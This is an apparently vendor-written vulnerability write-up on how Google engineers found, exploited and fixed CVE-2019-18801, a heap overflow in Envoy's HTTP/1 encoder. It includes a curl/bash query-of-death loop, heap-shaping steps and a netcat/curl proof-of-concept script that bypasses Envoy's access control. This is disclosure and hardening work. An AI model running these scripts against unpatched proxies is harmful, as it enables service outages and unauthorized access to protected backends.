Harvey Tuch
23 min read

Exploiting an Envoy heap vulnerability

At Google, we have a commitment to enhancing the security and reliability of the Envoy proxy. We have dedicated initiatives around hardening, fuzzing, and responding to CVEs that are intended to increase our confidence in the trustworthiness of Envoy as a component in our infrastructure stack and those of our customers. In addition, we offer a Vulnerability Reward Program, open to all security researchers who can provide details on security vulnerabilities in Envoy.

Why do we care about making Envoy secure? In addition to being good stewards of OSS projects, we also use Envoy to provide cloud services, like Internal HTTP(S) Load Balancing. For such services, customers depend on Google to uncover and resolve security issues.

This article provides a deep dive into an Envoy vulnerability that was successfully detected and fixed by our Envoy Platform team. The focus is on a single heap vulnerability in Envoy’s HTTP/1 codec which, if exploited, would allow an attacker to bypass Envoy’s access control and routing logic.

Heap vulnerabilities are rare in Envoy as we use modern C++ features such as smart pointers, fuzz the data plane and have high test coverage (97%+ line coverage). We also make use of Clang’s Address Sanitizer, which runs in our CI and during fuzzing. However, even a single heap vulnerability can provide a potent attack vector. We consider one of the contributions of this article to be raising the awareness over how heap vulnerabilities can be exploited on an L7 network proxy’s data plane, from first principles and with relatively little sophistication. This complements another recently published heap vulnerability in HAProxy’s HPACK implementation, CVE-2020–11100 from Google’s Project Zero.

The vulnerability we focus on below is CVE-2019–18801, which was fixed in the 1.12.2 Envoy security release in early December 2019. GCP’s Internal HTTP(S) Load Balancing product (which is based on Envoy), was patched prior to the embargo release date. Envoy-derived binaries, e.g. Istio, were patched in tandem with the release. We were alerted to a potential exploit while investigating a report from one of Envoy’s data plane fuzzers running on ClusterFuzz. It required about 2 days of work to turn into a viable proof-of-concept, which including time learning about tcmalloc internals, experimenting with heap exploits techniques (e.g. heap shaping, vptr manipulation, etc.), building out tooling and working through the story below.

It’s worth noting that the underlying implementation heap overrun bug would have been fixed even if no demonstrated exploit could have been found. Without the demonstration of exploitability, it would have been a correctness bug with potential security implications, and still worth fixing.

When talking about vulnerabilities, it’s helpful to be aware of the threat model. We take Envoy’s documented threat model and consider the case of an untrusted downstream client under the control of an attacker sending HTTP requests to an Envoy proxy in this article.

A fuzzy beginning

Work on this exploit began when we were notified that ClusterFuzz had filed a new issue, https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=18431. The fuzzer in question was codec_impl_fuzz_test, exercising Envoy’s HTTP/1 and HTTP/2 codecs.

Due to Envoy’s use of ASSERTs to state invariants related to buffer allocations, the potential for an overflow was given in the top-level fuzz report:

Crash Type: ASSERT
Crash Address:
Crash State:
bufferRemainingSize() >= length.
Envoy::Http::Http1::ConnectionImpl::copyToBuffer
Envoy::Http::Http1::RequestStreamEncoderImpl::encodeHeaders

By also examining the corpus provided by the fuzzer, it was evident that there was likely some interaction between the :method field and the Envoy::Http::Http1::ConnectionImpl::copyToBuffer() method in the HTTP/1 encoder.

headers {
key: “:method”
value: “GETactions {\n muta{\n ketruest_he key: ctions {\n ers {\n headers {\n key: ctions {\n new_streamTnrtasfTkey: ctioew: new_stream {asfer-e key: ctioew: r-e… and lots more like this… <several kilobytes long>”
}

Code inspection revealed that a memcpy was occurring within a buffer that didn’t depend on the:method header field value length in the HTTP/1.1 encode path. The code likely assumed that the only valid method values would be used, such as GET, POST, HEAD, etc. However, RFC 7231 allows for arbitrary header methods, as described in https://tools.ietf.org/html/rfc7231#section-4.

From vulnerability to exploit

The fuzzer crash demonstrated that there was at least some implementation bug. The next step in understanding the vulnerability was to determine whether it was possible to send arbitrary method values on the wire as a remote attacker and have Envoy attempt to encode them as HTTP/1.

Initial conversations with Envoy founder (and data plane expert) Matt Klein revealed that it was unlikely that the HTTP/1 parser would allow arbitrary methods at the decode stage. A simple experimental environment, in which an Envoy binary was pointed at an example bootstrap YAML for proxying to google.com demonstrated this was a correct assessment. Writing a request such as:

FooBar / HTTP/1.1
Host: foo

via netcat to the Envoy process and inspecting Envoy logs at trace level revealed that these non-standard methods are rejected immediately by http-parser:

[2019–10–31 00:36:49.162][84055][debug][http] [source/common/http/conn_manager_impl.cc:275] [C2] dispatch error: http/1.1 protocol error: HPE_INVALID_METHOD

However, Envoy can proxy requests from an HTTP/2 client to a HTTP/1 backend. It was less clear whether our HTTP/2 parser, built on nghttp2, would block arbitrary methods. In general, HTTP/2 encourages a more opaque treatment of header values and regularizes treatment of the request method via the :method pseudo-header. It was plausible that the HTTP/2 parser wouldn’t attempt to interpret the contents of this header.

To test this possibility, netcat was not very practical as a starting point, as we would need the ability to craft custom binary frames to send as an HTTP/2 request. curl provides the ability to add arbitrary request methods, so a probe request could be sent with:

Terminal window
curl --http2-prior-knowledge --request FooBar localhost:10000

This was successfully proxied through Envoy to the backend, so it seemed possible to exercise the code in question. The next probe was:

Terminal window
curl --http2-prior-knowledge --request “AAAAAA… around 4200 As AA” localhost:10000

When this request was applied to a debug Envoy build with ASSERTs enabled, the same crash that was reported by the fuzzer was observed. This was encouraging; now it was clear that a remote attacker with just curl could target any Envoy configured for downstream HTTP/2 and upstream HTTP/1, a fairly standard data plane forwarding behavior. It was clear at this point that the vulnerability might have wide scope and impact.

Query-of-death

An obvious attack from this kind of heap corruption is a query-of-death (QoD). This is the simplest heap exploit to consider, but if it was easily repeatable, it would mean that a remote attacker could bring down an entire edge fleet of Envoys with only 1 query per Envoy. This would lead to a highly asymmetric DoS attack.

After some experimentation, a QoD sequence that typically creates a crash within a few seconds was derived using just curl and some bash:

Terminal window
while true
do
curl -m $((( RANDOM % 5) + 1 )) \
--http2-prior-knowledge --request “AAAA… around 48kb As” \
localhost:10000 -d “foo” &
sleep 1
done

What’s going on here? Multiple curl requests are being sent. Each is overflowing a buffer. In this example we used a simple Python backend test server to sink the traffic:

Terminal window
python -m SimpleHTTPServer 1050

We use randomized delays for timeout to generate heap churn. This avoided falling into degenerate deterministic heap allocations, where we kept corrupting the same buffer that was never reused. The above example reproduces within a few requests and would have likely worked against a production service.

Data plane manipulation

Crashing an Envoy fleet via a QoD spray is a good start, but we can potentially do more with a heap overflow vulnerability such as this, by taking advantage of HTTP proxy specifics. Potential exploits include:

  • Corrupting other in-flight requests, for example rewriting contents or headers of some other user’s request.
  • Corrupting source/length of memory copies or buffers to read out arbitrary memory contents, leaking high value data such as crypto keys. By having contents copied into requests an attacker controls, a means of exfiltration on the wire may exist.
  • Remote code exploit (RCE), where complete remote ownership of the process takes place.

The most devastating remote attack is a reliable RCE or a memory read out. RCEs are somewhat trickier on the heap in comparison to the stack. This is because the heap is typically used for data accesses rather than control flow. However, in C++ we have the potential to corrupt vtable pointers, as well as regular function pointers.

RCEs are typically mitigated by ASLR. We started to explore by examining the text segment in /proc/<pid>/smaps, to establish whether ASLR was enabled for Envoy:

00400000-017ee000 r-xp 00000000 fe:01 17961168 /usr/local/.../bazel-out/k8-opt/bin/source/exe/envoy-static

This didn’t look very random; in fact it’s the link address. OSS Envoy was missing the -fPIE compile option and the Linux kernel can only do ASLR for a position independent executable. This was an oversight and was fixed in https://github.com/envoyproxy/envoy/pull/8792.

A key property of any exploit is it needs to be repeatable, not just a one in a billion possibility. To create a reliable exploit, we don’t want to rely on arbitrary memory contents being overwritten, as we don’t know what the heap looks like in general. Instead, we want the heap to be primed so that when a buffer overflow is triggered, there will be something located at the overflow location that is highly likely to result in an exploit possibility. The idea of priming the heap in this way is generally known as heap shaping (aka heap grooming, heap feng shui, see related heap spraying).

To understand how it’s possible to shape the heap in the Envoy case, a useful starting place is the memory allocator. In Envoy, this is tcmalloc, selected for its performance and profiling capabilities. A key insight that enables simple heap shaping is tcmalloc’s small object allocation algorithm. A number of heap allocation classes exist, grouping allocations into similar size classes. If two allocations of X bytes and ≈X bytes occur, they are likely to land in the same size class. On the hot path, each thread maintains its own free list for each size class. When depleted, the thread asks a global (central) allocator for more objects in this class. When the central allocator is depleted, it requests large contiguous page allocations (referred to as slabs) that are then broken up into the objects of the size class. The free list operates LIFO, so on a quiescent system, there is an opportunity to use these facts to arrange the free list and data allocations to create an exploit opportunity.

The first trick is to ensure that all objects, both the encoding buffer for the overflow and the target for the overflow come from the same size class. This provides the possibility that they will be coresident on the same slab of pages allocated by the central allocator. The encoding buffer is sized at 4kb + path length and comes from a reservation from Envoy’s Buffer::OwnedImpl. Ultimately, these reservations are backed by Buffer::OwnedSlice and allocated via a custom new. These heap allocations are rounded up to the next page size, so will be 8kb. As a result, we needed the target buffer for the attack to also be 8kb.

How could we create a target buffer of 8kb? There are a few ways to do this:

  1. Have multiple requests, each with allocations that are ≈8kb. We knew we could get this for free in the request encode buffer. By adjusting both start and completion times of requests, it would be possible to shape the ordering of the tcmalloc free lists.
  2. Sending large bodies in the request that are ≈8kb.
  3. We also had prior knowledge that Envoy’s HeaderMapImpl would malloc buffers to fit request header values, so using large headers could also force such allocations.

The next part of the attack was to have the encode buffer precede the target buffer and be within a range that header byte size limits would allow (64kb). To understand memory layout, we sent multiple large requests (with techniques 1–3) populated with ASCII A (0x41) in the method header and ASCII B (0x42) in the data payload, set a breakpoint on the firing ASSERT and inspected memory contents under gdb. This was a form of dye tracing. In addition, we inserted log messages at various sites to track likely large allocations of interest. Visually, it’s easy to page through memory around the target with a command such as:

(gdb) x /5000xw 0x26f0000

And see output like:

0x26f0000: 0x0138b490 0x00000000 0x026f0028 0x00000000
0x26f0010: 0x00000000 0x00000000 0x00000000 0x00000000
0x26f0020: 0x00001fd8 0x00000000 0x41414141 0x41414141
0x26f0030: 0x41414141 0x41414141 0x41414141 0x41414141
0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000
0x2701010: 0x00000000 0x00000000 0x00000000 0x00000000
0x2701020: 0x00001fd8 0x00000000 0x42424242 0x42424242
0x2701030: 0x42424242 0x42424242 0x42424242 0x42424242

After some fiddling around with ordering, multiplicity and timing, we got lucky. Envoy happened to allocate the header encoding buffer immediately before the slice related to the data payload. This luck was helpful but not necessary, we describe more explicit heap shaping below.

Now that we had a target Buffer::OwnedSlice, tweaking the method header size slightly to force it to overrun the buffer was possible via some iteration. The key to causing a crash here was to consider what the initial bytes of the target buffer look like:

0x2701000: 0x0138b490 0x00000000 0x02701028 0x00000000

There were some interesting targets here that are likely to cause segfaults if corrupted. The first was the C++ object vptr 0x0138b490. Writing 0x42424242 over this would crash control flow. The next is 0x02701028, which due to a detail of buffer implementation provides an indirect to the real buffer contents. This would also crash on access if corrupted and later accessed.

So, we had another repeatable crash vector. The next step was to consider what would happen if we rewrote the vptr in a more deliberate way. This would allow us to change later code execution. What if we rewrote the buffer base to point it at some arbitrary memory location we wanted to read? We might be able to copy into our request ranges of Envoy process memory.

We tweaked the overflow to include changes to pointer locations, using \x escaping in the curl strings. Unfortunately, Envoy started to reject the HTTP/2 client requests prior to them being able to reach the HTTP/1 encoder. This was because the HTTP/2 standard limits header value characters to printable ASCII characters as per RFC constraints on valid header values (https://tools.ietf.org/html/rfc7230#section-3.2.6). Nghttp2 enforces this property.

This limitation significantly reduced the potential for the exploit as developed so far; it was not possible to rewrite pointers in a meaningful way. Back to the drawing board.

Targeting plain memory allocations

Envoy performs both C++ object allocations on the heap via new and also regular plain mallocs. Plain mallocs don’t have the problem of vptr corruption. Large header values are allocated in dedicated malloc buffers in Envoy. What if it was possible to manipulate the contents of an in-flight header string to achieve some interesting outcome?

We knew from a previous CVE that being able to have the interpretation of the :path header by the backend be different to that used when Envoy performs its authorization checks (ext_authz, RBAC, route table lookup) is useful. It can provide bypass of Envoy’s authorization and access control capabilities, for example. So, we looked at what could be done to the path header. After some experimentation, the following seemed likely to work:

  1. Remote attacker shapes the heap with some preliminary requests.
  2. Remote attacker sends request A with the path set to //////////..about 8kb of /…/////. The advantages of this pattern is that it is often collapsed to / by backends.
  3. Envoy performs ext_authz, RBAC, routing on request A and then buffers request A. We assume the use of the buffer filter, which is not uncommon.
  4. Remote attacker sends request B with the method header overflow. The encoding buffer for B must precede the path header malloc for A, as a result of the shaping in (1).
  5. Request B modifies the path in A to point to /some_secret_treasure. The remote attacker now bypasses Envoy’s access controls and gains access via request A to protected backend services (the secret treasure).

A more sophisticated attacker might at this point have turned their attention to the tcmalloc heap data structures, or maybe looked for other raw malloc buffers that could be manipulated for RCE or leaking out crypto keys; this requires some time and creativity, and we already had a likely attack vector, so we moved onto making this exploit reliably reproducible. The key was to manage step (1) above.

Shaping the heap

For any non-crash exploit, we also ideally want the target buffer to still be active after the overflow request encoding occurs. This requires that we pay attention to the timing of requests and be able to have some ability to influence this; at this point curl alone is not the right tool.

There are dedicated packet and request manipulation tools, for example scapy. However, we had some HTTP/2 header encoding utilities from previous CVEs and fuzzers in Envoy, so we opted to use these as the basis for the attacks. We wrote a short utility based on these libraries to generate a file preamble-and-headers.bin providing connection prefix consisting of:

  • HTTP/2 client connection preface
  • Default SETTINGS frame
  • Initial WINDOW_UPDATE frame

together with a candidate HEADERS frame with the 8kb ///////.. path. A second file, data-eos.bin, had a DATA frame with EOS set. Using this pattern, netcat could be used to send, hold and finish a request stream, e.g.:

Terminal window
(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
nc -N localhost 10000

If we imagine the tcmalloc thread local cache slab for 8KB in question to look like H₀H₁H2 and free list to be [H₀, H₁, H₂] initially, we want to arrange something like:

  • H₀ = request encode buffer for overflow request B.
  • H₁ = malloc allocation for 8kb ///////.. path in target request A.

To shape the heap, we can send an initial shaping request with an 8kb path header, call this request S, and hold it. At this point, the free list looks like [H₁, H₂].

We then send request A and hold it. The free list looks like [H₂] and we have H₀ containing request S’s path header and H₁ containing request A’s path header.

We now send “end stream” for request S, resulting in a free list of [H₀, H₂].

We then send request B, which will have its request header allocated at H₀, immediately below request A’s path header. This is deterministic on a quiescent Envoy. It’s necessary to set — concurrency 1 to increase the odds of it working reliably. More sophisticated shaping could probably make this work with higher probability on loaded or multi-worker servers.

At this point, we have the techniques to deterministically overwrite the path of one request with contents in the method header of another request. The next step was to generate a proof-of-concept. We configured Envoy with the following HCM bootstrap:

- name: envoy.http_connection_manager
typed_config:
“@type”: type.googleapis.com/envoy.config.filter.network.http_connection_manager.v2.HttpConnectionManager
codec_type: HTTP2
stat_prefix: ingress_http
route_config:
name: local_route
virtual_hosts:
- name: local_service
domains: [“*”]
routes:
- match:
prefix: “/treasure”
headers:
- name: “:method”
exact_match: “GET”
direct_response:
status: 503
- match:
prefix: “/”
route:
cluster: service_google
http_filters:
- name: envoy.buffer
config:
max_request_bytes: 128000
- name: envoy.router

The /treasure path was supposed to be sinkholed. The use of GET header matching here is due to a technicality that becomes apparent when we expand what the backend sees below.

The attack script was then:

Terminal window
# Request S
(cat preamble-and-headers.bin; sleep 2; cat data-eos.bin) | \
nc -N localhost 10000 &
sleep 0.5
# Request A
(cat preamble-and-headers.bin; sleep 10; cat data-eos.bin) | \
nc localhost 10000 > result_containing_the_secret_treasure &
sleep 3
# Request B
curl --http2-prior-knowledge \
--request “AA.. about 8kb of A.. AA” \
localhost:10000/treasure -d “foo”

This roughly follows the logic described above, but there is one trick, the request for treasure is in the path, not the method overflow… why?

When we first attempted to overflow the buffer, and placed /treasure in the method header overflow, a strange request was delivered:

GET /treasure / HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 79a313a6–996d-4266-bf8f-646205d24ac9
x-envoy-expected-rq-timeout-ms: 15000
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////...///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: be710b85–8c80–46be-92cb-895191299638
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

There are two path specifiers in the first line of the request (illegal) and what looks to be two nested requests. Envoy’s HTTP/1 request encoder appended the buffer in request B, overflowed into request A, but then also continued to finalize the headers for request B inside request A’s path header value. We needed a slightly different strategy to make the exploit work given this behavior:

Terminal window
curl --http2-prior-knowledge \
--request “AA.. about 8kb of A.. AA” \
localhost:10000/treasure -d “foo”

We tweaked the overflow bytes in request B to position request B’s encoder such that once it had written its method inside its own buffer, the remainder of request B, starting with the /treasure path, became the new path for request A. Due to new line breaking in request A’s path, we end up with request A’s header encoding treated as request A’s HTTP body. The backend then observed:

GET /treasure HTTP/1.1
host: localhost:10000
user-agent: curl/7.64.0
accept: */*
content-length: 3
content-type: application/x-www-form-urlencoded
x-forwarded-proto: http
x-request-id: 95028bfb-7890–4f6a-a96f-1b43a48716c6
x-envoy-expected-rq-timeout-ms: 15000
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////...///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.1
host: host
foo: bCCCCC
x-forwarded-proto: http
x-request-id: 04964d4c-19a7–41bb-8a90-d2dedbe9755b
content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

We constructed a simple backend Flask Python server to be able to control timing and return the treasure. After running the above script, result_containing_the_secret_treasure has the desired treasure returned to the attacker.

Practical implications

At this point, given the careful timing and configuration choice, it’s reasonable to question the practical application of this exploit. Here we enumerate and examine some assumptions and considerations:

  • A HTTP/2 → HTTP/1 request path is a reasonably common Envoy data plane forwarding path.
  • The buffer filter is one of Envoy’s core filters that features in many configurations.
  • Assuming a quiescent server is a little more restrictive. However, regional servers and proxies may be quiescent at night. Also, it’s only necessary to access the hidden treasure once to have a successful attack. More sophisticated heap shaping would reduce the need for this restriction. Timing requirements may also depend on the nature of the shaping; in our example they were fairly generous and easy to implement with the sleep command at second granularity.
  • Envoy was run with — concurrency 1 to have all the requests land on the same worker thread. The attack may still work with other concurrency settings with some lower probability.
  • The GET header matching was needed due to the use of /treasure in request B. We needed to avoid the rejection of request B prior to forwarding and invoking the HTTP/1 encoder. This configuration choice is unusual, but there are other highly plausible scenarios in which we wouldn’t need to do this. For example, if there were two listeners with different route configurations, where one sink holed /treasure and the other didn’t, the GET header matching would not be required.
  • After the attack, the Envoy process had a corrupted memory allocator state. We couldn’t access the treasure again on a second replay with the same server. This increased the likelihood of detection (e.g. via core dump and analysis) and reduced the likelihood of the attack working on a noisier server.

This attack was built from first principles and ignores a large body of work and tooling around RCE and heap attacks, since our focus was on the HTTP data plane specific aspects. It’s entirely possible that more sophisticated heap exploits for the same vulnerability, with fewer constraints and assumptions, could be developed by security researchers who specialize in these kinds of attacks. The QoD attack and cross-request interference were also potentially impactful, regardless of either RCE or access control bypass.

For the purposes of Envoy security, we were convinced by the proof-of-concept that we had a critical security vulnerability and scored this as CVSS 9.0. We engaged Envoy’s security release process and worked with the Envoy OSS security team (which we overlap with in membership) to deliver the 1.12.2 security release with the fix for this bug. The fuzzer bug was reported October 22 and the following security release occurred December 10 2019.

Hardening Envoy’s data plane

Following the security release, we conducted an audit of other uses of memcpy and C string functions across the Envoy code base, removing most of these and validating the remainder. The reason that this vulnerability existed was due to the use of manual buffer memory management, which is highly discouraged in the code base; most of Envoy works with safe C++ abstractions.

The HTTP/1 request encoder now uses Envoy’s standard buffer abstraction rather than its own internal memory management and pointer arithmetic.

Envoy now builds by default as a position independent executable. Any distribution with ASLR enabled will benefit from this.

We have also opened issues to consider further hardening:

Heap vulnerabilities exploitable from untrusted client traffic are rare but potentially highly impactful. These black swans need to be taken seriously by those who develop and operate any networking infrastructure implemented in languages where memory safety is not guaranteed. This article has provided a case study in how Google’s Envoy Platform team went about discovering and mitigating the only demonstrated remote exploit of this variety to date in the Envoy proxy. We look forward to continuing to harden Envoy to structurally prevent this class of vulnerabilities.

Acknowledgements: Original triage and investigation for the CVE was supported by Matt Klein, the Google Envoy Platform team and Google ISE team. The ClusterFuzz infrastructure helped discover the ASSERT violation and generated the initial fuzz report (built on Oss-Fuzz). Thanks to reviewers of drafts of this document who contributed a number of improvements, including Joshua Marantz, Stewart Reichling, Felix Gröbert, Christoph Kern and Joshua Blatt. Yan Avlasov led the Envoy OSS fix efforts for CVE-2019–18801, resulting in the Envoy 1.12.2 release. Dan Noé contributed a number of low-level C function cleanups to Envoy in the wake of the security release.

Disclaimer: The opinions stated here are my own, not those of my company (Google).